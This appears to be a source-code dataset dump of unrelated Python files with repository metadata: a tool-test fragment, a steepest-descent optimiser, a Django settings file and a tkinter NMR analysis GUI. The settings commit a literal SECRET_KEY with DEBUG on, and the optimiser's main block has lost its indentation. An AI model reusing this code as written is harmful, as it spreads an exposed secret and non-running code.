                        self.__expand_grouping_for_data_input(name, value, extra, input_name, input_value)
            elif isinstance( self.tool.inputs[name], parameters.DataToolParameter ):
                self.required_files.append( ( value, extra ) )
        except: pass
        self.inputs.append( ( name, value, extra ) )
    def add_output( self, name, file ):
        """Record an expected output file for the named output."""
        self.outputs.append( ( name, file ) )
    def __expand_grouping_for_data_input( self, name, value, extra, grouping_name, grouping_value ):
        """Recursively search a grouped input for a DataToolParameter named
        *name*; when found, append its (value, extra) to required_files.
        Returns True on a match (None otherwise)."""
        # Currently handles grouping.Conditional and grouping.Repeat
        if isinstance( grouping_value, grouping.Conditional ):
            # The test param that selects the case is not itself a data input.
            if name != grouping_value.test_param.name:
                for case in grouping_value.cases:
                    for case_input_name, case_input_value in case.inputs.items():
                        if case_input_name == name and isinstance( case_input_value, basic.DataToolParameter ):
                            self.required_files.append( ( value, extra ) )
                            return True
                        elif isinstance( case_input_value, grouping.Conditional ):
                            # Nested conditionals are searched recursively.
                            self.__expand_grouping_for_data_input(name, value, extra, case_input_name, case_input_value)
        elif isinstance( grouping_value, grouping.Repeat ):
            # FIXME: grouping.Repeat can only handle 1 repeat param element since the param name
            # is something like "input2" and the expanded page display is something like "queries_0|input2".
            # The problem is that the only param name on the page is "input2", and adding more test input params
            # with the same name ( "input2" ) is not yet supported in our test code ( the lat one added is the only
            # one used ).
            for input_name, input_value in grouping_value.inputs.items():
                if input_name == name and isinstance( input_value, basic.DataToolParameter ):
                    self.required_files.append( ( value, extra ) )
                    return True
| [
"h-morita@esm.co.jp"
] | h-morita@esm.co.jp |
835ae6671986312e9febcc5c4269d9c60e34366d | 32cba9d6b0cb420e13a2a26c9e8c3d07e2c127b6 | /附录A 梯度下降法/最速下降法(原生Python+scipy导数计算实现).py | cee687d26b7245cfa1b086e591ae59819bbce477 | [] | no_license | wanglg007/Lihang-Statistical-learning-methods-Code | bed22551a2883b40e93340d3f96cf2fcf9e19ef2 | 190d16310be154282550e1f55eaadd8c4dd83263 | refs/heads/main | 2023-07-03T17:00:35.809206 | 2021-08-02T08:37:33 | 2021-08-02T08:37:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,826 | py | from scipy.misc import derivative
def partial_derivative(func, arr, dx=1e-6):
    """Numerically compute the gradient of an n-ary function at a point.

    Each partial derivative is estimated with a 3-point central difference,
    (f(x+dx) - f(x-dx)) / (2*dx) — the same default formula used by the
    deprecated (and since removed) scipy.misc.derivative, so this version
    needs no SciPy at all while returning the same values.

    :param func: [function] function of n variables, called as func(list)
    :param arr: [list/tuple] coordinates of the evaluation point
    :param dx: [int/float] finite-difference step
    :return: [list] partial derivatives, one per coordinate
    """
    n_features = len(arr)
    ans = []
    for i in range(n_features):
        def f(x):
            # Same point with only coordinate i replaced by x.
            arr2 = list(arr)
            arr2[i] = x
            return func(arr2)
        # 3-point central difference around arr[i].
        ans.append((f(arr[i] + dx) - f(arr[i] - dx)) / (2 * dx))
    return ans
def golden_section_for_line_search(func, a0, b0, epsilon):
    """One-dimensional minimisation by the golden-section method.

    :param func: [function] one-variable function to minimise
    :param a0: [int/float] left edge of the search interval
    :param b0: [int/float] right edge of the search interval
    :param epsilon: [int/float] interval width at which to stop
    :return: [float] approximate minimiser
    """
    ratio = 0.382
    left = a0 + ratio * (b0 - a0)
    right = b0 - ratio * (b0 - a0)
    f_left, f_right = func(left), func(right)
    while right - left > epsilon:
        if f_left <= f_right:
            # Minimum lies in [a0, right]; the old left probe becomes the
            # new right probe, so only one new evaluation is needed.
            b0, right, f_right = right, left, f_left
            left = a0 + ratio * (b0 - a0)
            f_left = func(left)
        else:
            # Minimum lies in [left, b0]; reuse the old right probe.
            a0, left, f_left = left, right, f_right
            right = b0 - ratio * (b0 - a0)
            f_right = func(right)
    return (left + right) / 2
def steepest_descent(func, n_features, epsilon, distance=3, maximum=1000):
    """Gradient descent (steepest descent) minimisation.

    :param func: [function] n-ary objective function
    :param n_features: [int] number of variables of the objective
    :param epsilon: [int/float] convergence tolerance
    :param distance: [int/float] length of each 1-D line search
                     (distance times the gradient)
    :param maximum: [int] maximum number of iterations
    :return: [list] coordinates of the result point (None if not converged
             within *maximum* iterations)
    """
    x0 = [0] * n_features  # initial point at the origin
    y0 = func(x0)  # objective value at the current point
    for _ in range(maximum):
        nabla = partial_derivative(func, x0)  # gradient at x0
        # Stop when the gradient norm falls below the tolerance.
        if pow(sum([nabla[i] ** 2 for i in range(n_features)]), 0.5) < epsilon:
            return x0
        def f(x):
            """Objective restricted to the (negative) gradient direction."""
            x2 = [x0[i] - x * nabla[i] for i in range(n_features)]
            return func(x2)
        # 1-D golden-section search for the best step length along -nabla.
        lk = golden_section_for_line_search(f, 0, distance, epsilon=1e-6)
        x1 = [x0[i] - lk * nabla[i] for i in range(n_features)]  # take the step
        y1 = func(x1)  # objective value at the new point
        if abs(y1 - y0) < epsilon:  # stop when the improvement is negligible
            return x1
        x0, y0 = x1, y1
if __name__ == "__main__":
# [0]
print(steepest_descent(lambda x: x[0] ** 2, 1, epsilon=1e-6))
# [-2.9999999999635865, -3.999999999951452]
print(steepest_descent(lambda x: ((x[0] + 3) ** 2 + (x[1] + 4) ** 2) / 2, 2, epsilon=1e-6))
| [
"1278729001@qq.com"
] | 1278729001@qq.com |
3da220abe75276076ddd8974828a018d7b3360a5 | 0e1642c805231cd1baca8b8cc33ef413e5196a52 | /webpersonal/settings.py | cb6f8a74000322a7440d34c44aa7b063ca96be81 | [] | no_license | Maz191099/WebPersonal | d90e2875ba38af1b6797c9f5ad13f267c7047d7b | 1a06ad539d825fc2d975a1582f02ed5b9332b4bd | refs/heads/master | 2022-07-13T15:27:55.529652 | 2020-05-14T03:29:29 | 2020-05-14T03:29:29 | 263,482,878 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,234 | py | """
Django settings for webpersonal project.
Generated by 'django-admin startproject' using Django 2.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; for any real
# deployment it should be rotated and loaded from the environment.
SECRET_KEY = 'x3u2k+c37ir#eykfemn7duu%z6#(o5^j^9gt#@e+3=_xuj)58k'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Empty list: only localhost is served while DEBUG is on; must be filled
# with real hostnames before deploying with DEBUG = False.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'core',
    'portfolio.apps.PortfolioConfig',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'webpersonal.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'webpersonal.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
# Development default: a single SQLite file next to the project.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'es'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
# Media files (user uploads) are served from <project>/media
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, "media")
"maz191099@gmail.com"
] | maz191099@gmail.com |
447262b57cdd1f1dfb6ac8474cbf7c1ad24cf23d | c2400a1efe03aa816f742e2ca9ccb4bc9e815286 | /nmr_gui_v0.2.py | 790aa8c5d4bf1deaf79f973c114058139816080e | [] | no_license | jnejc/nmr_gui | 484fb66b21355044d32378c951a9c41030f0aa8f | 58c5cf94e50f30a92fec9165d4268db6656c61bd | refs/heads/main | 2023-08-20T21:55:28.157162 | 2021-10-26T14:19:44 | 2021-10-26T14:19:44 | 421,452,290 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203,061 | py | #######################################
# Gui program for analyzing nmr data (from 7NMR)
# created by Nejc Jansa
# nejc.jansa@ijs.si
# document creation 14.11.2016
# last version: 06.11.2018
#######################################
# Beta version (0.2)
# Memory leak not adressed, have to restart between long datasets to prevent freezing and loss of data!
# Works with analysis_v2.py
# Ideas for next version:
# Should split up code in several files for clarity
# Allow moving of files into diffent trace (for patching up bad sets)
# Marking of traces that are interesting, renaming, hiding Bad files...
# Find memory leak in tkinter/matplotlib
# Test direct execution or even transforming into .exe?
# Clear up dead buttons
# Prevent multiple plot instances from opening
# Better keyboard control
# More consistency with class naming and functions/methods
# A way of combining datasets, management of the raw data files
# Plotting specra angle dependence
# More controll over analysis parameters, make editable tables for it
# a D1 plot
# Implement parameters for smaller figure sizes to account for smaller resolution!!
# External input of new fitting formulas
# Simplify adding a sum of fits
# Remember selected fit function for each trace
# Better export format for fit results
# Select what is exported/ displayed/ plotted
# do not auto fit when opening old data (or remember the old fit function)
# add manual change of SHL and phase in T1, T2
# fix the export temperatures not matching file names (due to decimals)
# Versions of packages:
# numpy-1.11.2+mkl-cp35-cp35m-win_amd64.whl
# scipy-0.18.1-cp35-cp35m-win_amd64.whl
# matplotlib-2.0.0-cp35-cp35m-win_amd64.whl
# necessary imports
import numpy as np # for mathematic functions
import matplotlib # for plotting
import csv # for importing and exporting csv files
import gc
### now using matplotlib 2.0.0
import matplotlib.pyplot as plt
matplotlib.use('TkAgg') # sets tkinter to be the backend of matplotlib
#matplotlib canvas and plot edit toolbar
#from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
# implement the default mpl key bindings
from matplotlib.backend_bases import key_press_handler
#scipy fitting function
from scipy.optimize import curve_fit
# (Tkinter for Python 3) gui objects
import tkinter as tk
from tkinter import ttk
from tkinter import messagebox
#import analysis functions and classes
from analysis_v2 import *
#colorbrewer nice plot colot set
colors = ['#e41a1c','#377eb8','#4daf4a','#984ea3','#ff7f00','#ffff33','#a65628','#f781bf','#999999',
'#e41a1c','#377eb8','#4daf4a','#984ea3','#ff7f00','#ffff33','#a65628','#f781bf','#999999',
'#e41a1c','#377eb8','#4daf4a','#984ea3','#ff7f00','#ffff33','#a65628','#f781bf','#999999']
#set some global settings for plots
plot_font = {'family': 'Calibri', 'size': '12'}
matplotlib.rc('font', **plot_font) # make the font settings global for all plots
### global data
#make sure things that are going to change in future and might be used in multiple places are here!
GLOBAL_experiment_dirs = ['pkl', 'raw', 'csv']
GLOBAL_t1_default_params = {'mean_range':(-4,None), 'offset':(1500,None),
'integral_range':(2000,2100), 'mirroring':False}
GLOBAL_t2_default_params = {'mean_range':(0,4), 'offset':(1500,None),
'integral_range':(2000,2100), 'mirroring':False}
GLOBAL_t1_displayed_params = ['T1', 'r', 'analysed', 'disabled', 'mirroring', 'fr', 'temp_set', 'mean_shl',
'mean_phase_deg', 'mean_range', 'offset_range', 'integral_range',
'file_key', 'file_dir', 'TAU', 'D1', 'D3', 'D9', 'NS', 'D5_min']
GLOBAL_t2_displayed_params = ['T2', 'r', 'analysed', 'disabled', 'mirroring', 'fr', 'temp_set', 'mean_shl',
'mean_phase_deg', 'mean_range', 'offset_range', 'integral_range',
'file_key', 'file_dir', 'D1', 'D3', 'D9', 'NS']
GLOBAL_spc_default_params = {'shl_start':220, 'offset':(1500,None),
'integral_range':(2000,2100), 'mirroring':False}
GLOBAL_spc_displayed_params = ['fr', 'broaden_width', 'fr_density', 'analysed', 'disabled', 'mirroring', 'temp_set', 'mean_shl',
'mean_range', 'offset_range', 'integral_range',
'file_key', 'file_dir', 'TAU', 'D1', 'D3', 'D9', 'NS']
class Frame_experiments(tk.Frame):
    '''Leftmost frame with selection of experiment'''
    def __init__(self, parent):
        '''makes the subframe and fills it up'''
        tk.Frame.__init__(self, parent, bd=5)
        self.pack(side='left', fill='y')
        #reference to parent (the main application; provides .data, .traces, ...)
        self.parent = parent
        #load widgets
        self.Widgets()
    def Widgets(self):
        '''Puts all the widgets on the frame'''
        #adds label to frame
        self.label_experiments = tk.Label(self, text='Experiments')
        self.label_experiments.pack(side='top')
        #adds list to frame
        self.listbox_experiments = tk.Listbox(self, exportselection=0, bd=5,
            relief='flat', height=15)
        self.listbox_experiments.pack(side='top',fill='y')
        #keyboard shortcuts: Enter opens, F5 creates a new experiment
        self.listbox_experiments.bind('<Return>', self.Open)
        self.listbox_experiments.bind('<F5>', self.New)
        #checks for all experiments (keys of the application's data dict)
        for experiment in sorted(self.parent.data):
            self.listbox_experiments.insert('end', experiment)
        self.listbox_experiments.focus()
        #adds button to frame
        self.button_open = ttk.Button(self, text='Open', command=self.Open)
        self.button_open.pack(side='top')
        self.button_new = ttk.Button(self, text='New', command=self.New)
        self.button_new.pack(side='top')
    def New(self, event=None):
        '''Actions to perform when button_new is pressed'''
        #define button functions
        def Create(event=None):
            '''Create action, creates new experiment_data'''
            try:
                new_name = self.entry_new.get()
                #create the on-disk layout: data/<name>/{pkl,raw,csv}
                path = os.path.join('data', new_name)
                os.mkdir(path)
                for sub_dir in GLOBAL_experiment_dirs:
                    os.mkdir(os.path.join(path, sub_dir))
                #adds an entry to listbox
                self.listbox_experiments.insert('end', new_name)
                #creates the Experiment_data
                self.parent.data[new_name] = Experiment_data(new_name)
                #asks for folder with the raw measurement files
                #NOTE(review): 'root' is presumably the module-level Tk root — confirm
                dir_new = tk.filedialog.askdirectory(parent=root,initialdir="/",title='Please select a directory')
                self.parent.data[new_name].raw_dir = dir_new
                self.parent.data[new_name].Add_series()
                self.parent.data[new_name].Pkl_save()
            except FileExistsError:
                tk.messagebox.showerror('Error','The directory already exists!')
            #forgets and removes the button and entry field
            Cancel()
        def Cancel(event=None):
            '''Cancel button action, removes the entry boxes'''
            self.frame_new.destroy()
            #reenables the buttons
            self.button_new.config(state='normal')
            self.button_open.config(state='normal')
            self.listbox_experiments.bind('<Return>', self.Open)
            self.listbox_experiments.bind('<F5>', self.New)
            #focus back to experiments listbox
            self.listbox_experiments.focus()
        #build the addon frame under experiments
        self.frame_new = tk.Frame(self)
        #add label
        self.label_new = tk.Label(self.frame_new, text='New experiment', bd=5)
        self.label_new.pack(side='top')
        #add entry box and set it to focus
        self.entry_new = ttk.Entry(self.frame_new, takefocus=True)
        self.entry_new.pack(side='top')
        self.entry_new.focus()
        #define enter and ecape commands within entry box
        self.entry_new.bind('<Return>', Create)
        self.entry_new.bind('<Escape>', Cancel)
        #add create button
        self.button_create = ttk.Button(self.frame_new, text='Create', command=Create)
        self.button_create.pack(side='top')
        #add cancel creation button
        self.button_cancel = ttk.Button(self.frame_new, text='Cancel', command=Cancel)
        self.button_cancel.pack(side='top')
        #disable the upper buttons to prevent multiple entry boxes
        self.button_new.config(state='disabled')
        self.button_open.config(state='disabled')
        self.listbox_experiments.unbind('<Return>')
        self.listbox_experiments.unbind('<F5>')
        #pack the holding frame
        self.frame_new.pack(side='top')
    def Open(self, event=None):
        '''Opens selected experiment and shows available series'''
        #define button functions
        def Select(event=None):
            '''Opens the traces of the selected series, loads them into listbox'''
            #get the selected series
            self.parent.current_series = self.listbox_series.get('active')
            #call traces frame functions
            self.parent.traces.Load_series()
        def Refresh(event=None):
            '''Updates raw_file_list by scanning directories again'''
            self.parent.data[self.parent.current_experiment].Find_raw_files()
            for serie in self.parent.data[self.parent.current_experiment].series:
                self.parent.data[self.parent.current_experiment].series[serie].Keys()
            msg = 'The file directory was scanned and the file lists updated!'
            tk.messagebox.showinfo('File list updated', msg)
        def Save(event=None):
            '''Save and close the current experiment'''
            self.frame_series.destroy()
            #reenables the buttons
            self.button_new.config(state='normal')
            self.button_open.config(state='normal')
            self.listbox_experiments.config(state='normal')
            self.listbox_experiments.bind('<Return>', self.Open)
            self.listbox_experiments.bind('<F5>', self.New)
            #focus back to experiments listbox
            self.listbox_experiments.focus()
            #pickle all the containing data
            self.parent.data[self.parent.current_experiment].Pkl_save()
            #close up other frames
            self.parent.traces.Disable()
            self.parent.temperatures.Disable()
        #remembers what experiment we are working on and loads it
        #(lazy load: unpickle only on first open)
        self.parent.current_experiment = self.listbox_experiments.get('active')
        if not self.parent.data[self.parent.current_experiment].opened:
            self.parent.data[self.parent.current_experiment].Pkl_load()
            self.parent.data[self.parent.current_experiment].opened = True
        #disable the upper buttons to prevent multiple frames
        self.button_new.config(state='disabled')
        self.button_open.config(state='disabled')
        self.listbox_experiments.config(state='disabled')
        self.listbox_experiments.unbind('<Return>')
        self.listbox_experiments.unbind('<F5>')
        #makes new frame for popup series
        self.frame_series = tk.Frame(self)
        #button to close and save series section
        self.button_save = ttk.Button(self.frame_series, text='Save & Close', command=Save)
        self.button_save.pack(side='top')
        #button to update file lists
        self.button_refresh = ttk.Button(self.frame_series, text='Refresh files', command=Refresh)
        self.button_refresh.pack(side='top')
        #add label
        self.label_series = tk.Label(self.frame_series, text='Series', bd=5)
        self.label_series.pack(side='top')
        #add listbox
        self.listbox_series = tk.Listbox(self.frame_series, exportselection=0, bd=5, relief='flat')
        self.listbox_series.pack(side='top', fill='y')
        self.listbox_series.bind('<Return>', Select)
        #fill listbox with the experiment's series names
        for series in sorted(self.parent.data[self.parent.current_experiment].series):
            self.listbox_series.insert('end', series)
        self.listbox_series.focus()
        #add buttons
        self.button_select = ttk.Button(self.frame_series, text='Select', command=Select)
        self.button_select.pack(side='top')
        #pack popdown frame
        self.frame_series.pack(side='top')
class Frame_traces(tk.Frame):
    '''Listbox column for the traces of the currently selected series.

    Owned by a parent frame that exposes: ``data`` (experiment dict),
    ``current_experiment`` / ``current_series`` / ``current_trace`` keys,
    and sibling frames ``temperatures`` and the ``plot_*`` attributes this
    class creates.  Sibling frames reach into ``self.button_show`` to
    enable/disable it, so widget attribute names are part of the interface.
    '''
    def __init__(self, parent):
        '''Builds the frame, packs it, and creates all child widgets.

        parent -- the container frame; also used as a data/state hub (see
                  class docstring).
        '''
        tk.Frame.__init__(self, parent, bd=5)
        self.pack(side='left', fill='y')
        #reference to parent
        self.parent = parent
        #load widgets
        self.Widgets()
        #flag to keep track if frame is already in use
        self.enabled = False
    def Widgets(self):
        '''Creates label, trace listbox and buttons; all start disabled
        until a series is loaded (see Enable/Load_series).'''
        #add label
        self.label_traces = tk.Label(self, text='Traces', state='disabled')
        self.label_traces.pack(side='top')
        #add listbox; exportselection=0 keeps the selection when focus moves
        #to other listboxes in the app
        self.listbox_traces = tk.Listbox(self, exportselection=0, bd=5, height=30,
                                         relief='flat', state='disabled')
        self.listbox_traces.pack(side='top',fill='y')
        #Return on the listbox acts like pressing the Edit button
        self.listbox_traces.bind('<Return>', self.Edit)
        #adds button to frame
        self.button_show = ttk.Button(self, text='Edit', command=self.Edit, state='disabled')
        self.button_show.pack(side='top')
        #NOTE(review): attribute is named button_delete but it is the 'Plot'
        #button; renaming is avoided here because sibling frames may reference
        #these attributes by name.
        self.button_delete = ttk.Button(self, text='Plot', command=self.Plot,
                                        state='disabled')
        self.button_delete.pack(side='top')
        self.button_new = ttk.Button(self, text='New', command=self.New, state='disabled')
        self.button_new.pack(side='top')
    def Enable(self):
        '''Enables the items in the frame (no-op if already enabled).'''
        if not self.enabled:
            for child in self.winfo_children():
                child.config(state='normal')
            self.enabled = True
    def Disable(self):
        '''Disables all items in the frame (no-op if already disabled).'''
        if self.enabled:
            for child in self.winfo_children():
                child.config(state='disabled')
            self.enabled = False
    def Load_series(self):
        '''Fills the listbox with the trace keys of the currently selected
        series and gives the listbox keyboard focus.'''
        self.Enable()
        self.Clear()
        #NOTE(review): '.keys' here is presumably an attribute of the project
        #series class (not dict.keys()) — confirm against its definition.
        for key in sorted(self.parent.data[self.parent.current_experiment].series[self.parent.current_series].keys):
            self.listbox_traces.insert('end', key)
        self.listbox_traces.focus()
    def Clear(self):
        '''Cleanup actions to do when another series is opened, or experiment is closed'''
        self.listbox_traces.delete(0, 'end')
    def Edit(self, event=None):
        '''Stores the active trace as current and loads it into the
        temperatures frame for per-temperature analysis.'''
        self.parent.current_trace = self.listbox_traces.get('active')
        self.parent.temperatures.Load_trace()
    def Plot(self):
        '''Opens the result-vs-temperature plot frame matching the series
        type (T1vT / T2vT / Spectrum) for the active trace.'''
        #disable Temperatures frame
        self.parent.temperatures.Disable()
        #disable interfering buttons
        self.button_show.config(state='disabled')
        #save selected trace
        self.parent.current_trace = self.listbox_traces.get('active')
        #T1 analysis
        if self.parent.current_series == "T1vT":
##            try:
##                if self.parent.plot_t1_t1vt.counter > 0:
##                    self.parent.plot_t1_t1vt.Add_trace(self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace])
##            except:
            self.parent.plot_t1_t1vt = Frame_plot_T1_t1vt(self.parent, self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace])
            self.parent.plot_t1_t1vt.Add_trace(self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace])
        elif self.parent.current_series == "T2vT":
            self.parent.plot_t2_t2vt = Frame_plot_T2_t2vt(self.parent, self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace])
            self.parent.plot_t2_t2vt.Add_trace(self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace])
        elif self.parent.current_series == "Spectrum":
            self.parent.plot_spc_frvt = Frame_plot_spc_frvt(self.parent, self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace])
            self.parent.plot_spc_frvt.Add_trace(self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace])
    def New(self):
        '''Placeholder: reports the feature as incomplete and shows a dummy
        matplotlib figure with hard-coded data.'''
        Error_incomplete()
        plt.figure(figsize=(8,6))
        plt.plot([1,2,3,4,5,6,7], color=colors[1])
        plt.title("Fids")
        plt.xlabel("t (index)")
        plt.ylabel("signal")
        plt.grid()
        #print the plot
        plt.show()
    def Edit_set(self):
        '''Changes to single selection in the trace listbox and enabled edit button'''
        Error_incomplete()
    def Plot_set(self):
        '''Changes to multiple selection to allow plotting of several traces'''
        Error_incomplete()
class Frame_temperatures(tk.Frame):
    '''Listbox column for the temperature points of the current trace.

    Drives the per-temperature analysis loop: `Show` iterates the selected
    temperatures and, for each, launches the matching analysis/review frame
    via Analyze_fid; the ``wait`` BooleanVar blocks the loop (through
    ``root.wait_variable``) until that frame signals completion.
    Analysed points are shown green, disabled points red.
    '''
    def __init__(self, parent):
        '''Builds the frame, packs it, creates widgets and loop state.'''
        tk.Frame.__init__(self, parent, bd=5)
        self.pack(side='left', fill ='y')
        #reference to parent
        self.parent = parent
        #load widgets
        self.Widgets()
        #flag to keep track if frame is already in use
        self.enabled = False
        #loop gate: analysis frames set this False when they finish
        self.wait = tk.BooleanVar(master=self, value=False)
        #memory of selected params
        #NOTE(review): these alias the global default dicts; analysis frames
        #mutate them in place (e.g. previous_t1['mean_range']=...), so the
        #globals themselves change after the first run — confirm intended.
        self.previous_t1 = GLOBAL_t1_default_params
        self.previous_t2 = GLOBAL_t2_default_params
        self.previous_spc = GLOBAL_spc_default_params
    def Analyze_fid(self, trace):
        '''Opens the right frame for one temperature point of *trace*.

        Already-analysed points go straight to the review frame and release
        the wait gate immediately; unanalysed points open the interactive
        quick-analysis frame, which releases the gate itself when done.
        Unknown series types report "incomplete" and clean up.
        '''
        #T1 analysis
        if self.parent.current_series == "T1vT":
            if trace.analysed:
                #skip to reviewing
                self.parent.plot_t1_view = Frame_plot_T1_view(self.parent, trace)
                self.wait.set(False)
            else:
                #run analysis
                self.parent.plot_t1_quick = Frame_plot_T1_quick(self.parent, trace)
        elif self.parent.current_series == "T2vT":
            if trace.analysed:
                #skip to reviewing
                self.parent.plot_t2_view = Frame_plot_T2_view(self.parent, trace)
                self.wait.set(False)
            else:
                #run analysis
                self.parent.plot_t2_quick = Frame_plot_T2_quick(self.parent, trace)
        elif self.parent.current_series == "Spectrum":
            if trace.analysed:
                #skip to reviewing
                self.parent.plot_spc_view = Frame_plot_spc_view(self.parent, trace)
                self.wait.set(False)
            else:
                #run analysis
                self.parent.plot_spc_quick = Frame_plot_spc_quick(self.parent, trace)
        else:
            #unknown series type: report and restore the UI state that Show()
            #disabled (self.parent.temperatures is this very frame)
            Error_incomplete()
            self.parent.temperatures.wait.set(False)
            self.button_show.config(state='normal')
            self.parent.traces.button_show.config(state='normal')
            #refresh the temperatures tab
            self.parent.temperatures.Load_trace()
    def Widgets(self):
        '''Creates label, scrollable multi-select listbox and buttons.'''
        #button functions
        def Show(action=None):
            '''Runs the analysis loop over all selected temperatures,
            blocking on self.wait between points.'''
            #disable buttons that could interrupt loop
            self.button_show.config(state='disabled')
            self.parent.traces.button_show.config(state='disabled')
            #run analysis loop
            for select in self.listbox_temperatures.curselection():
                temp = self.listbox_temperatures.get(select)
                self.wait.set(True)
                self.Analyze_fid(self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace][temp])
                #wait until the analysis is finished before continuing the loop!
                root.wait_variable(self.wait)
            #reenable buttons
            self.button_show.config(state='normal')
            self.parent.traces.button_show.config(state='normal')
            #refresh the temperatures tab
            self.parent.temperatures.Load_trace()
        def Delete():
            '''Removes the selected temperature points from the trace dict
            (data only; files on disk are untouched).'''
            #loop over selected files
            for select in self.listbox_temperatures.curselection():
                temp = self.listbox_temperatures.get(select)
                self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace].pop(temp, None)
            #refresh list
            self.Load_trace()
        def Deselect(action=None):
            '''Deselects the active entries in listbox'''
            self.listbox_temperatures.selection_clear(0,'end')
        #add label
        self.label_temperatures = tk.Label(self, text='Temperatures', state='disabled')
        self.label_temperatures.pack(side='top')
        #listbox frame
        self.frame_listbox = tk.Frame(self)
        self.frame_listbox.pack(side='top', fill='y')
        #add listbox ('extended' allows shift/ctrl multi-select)
        self.listbox_temperatures = tk.Listbox(self.frame_listbox, selectmode='extended', exportselection=0,
                                               bd=5, relief='flat', state='disabled', height=30)
        self.listbox_temperatures.pack(side='left',fill='y')
        #keybinds for listbox
        self.listbox_temperatures.bind('<Return>', Show)
        self.listbox_temperatures.bind('<Escape>', Deselect)
        #add scrollbar
        self.scrollbar_listbox = ttk.Scrollbar(self.frame_listbox, orient='vertical')
        self.scrollbar_listbox.config(command=self.listbox_temperatures.yview)
        self.scrollbar_listbox.pack(side='right',fill='y')
        self.listbox_temperatures.config(yscrollcommand=self.scrollbar_listbox.set)
        #adds button to frame
        self.button_show = ttk.Button(self, text='Show', command=Show, state='disabled')
        self.button_show.pack(side='top')
        self.button_deselect = ttk.Button(self, text='Deselect', command=Deselect,
                                          state='disabled')
        self.button_deselect.pack(side='top')
        self.button_delete = ttk.Button(self, text='Delete', command=Delete, state='disabled')
        self.button_delete.pack(side='top')
    def Enable(self):
        '''Enables the items in the frame.

        try/except: some children (e.g. the inner frame holding the listbox)
        do not accept a 'state' option, hence the blanket skip; the listbox
        lives inside that frame so it is enabled explicitly afterwards.
        '''
        if not self.enabled:
            for child in self.winfo_children():
                try:
                    child.config(state='normal')
                except: pass
            self.listbox_temperatures.config(state='normal')
            self.enabled = True
    def Disable(self):
        '''Disables the items in the frame (mirror of Enable).'''
        if self.enabled:
            for child in self.winfo_children():
                try:
                    child.config(state='disabled')
                except: pass
            self.listbox_temperatures.config(state='disabled')
            self.enabled = False
    def Load_trace(self):
        '''(Re)fills the listbox from the current trace and colour-codes each
        point: green = analysed, red = disabled (red wins if both).'''
        if self.enabled:
            self.Clear()
        elif not self.enabled:
            self.Enable()
            self.Clear()
        for temp in sorted(self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace]):
            self.listbox_temperatures.insert('end', temp)
        self.listbox_temperatures.focus()
        for i, temp in enumerate(self.listbox_temperatures.get(0, 'end')):
            if self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace][temp].analysed:
                self.listbox_temperatures.itemconfig(i, bg='pale green',
                                                     selectbackground='dark green')
            #try:
            if self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace][temp].disabled:
                self.listbox_temperatures.itemconfig(i, bg='light salmon',
                                                     selectbackground='red')
            #except: pass
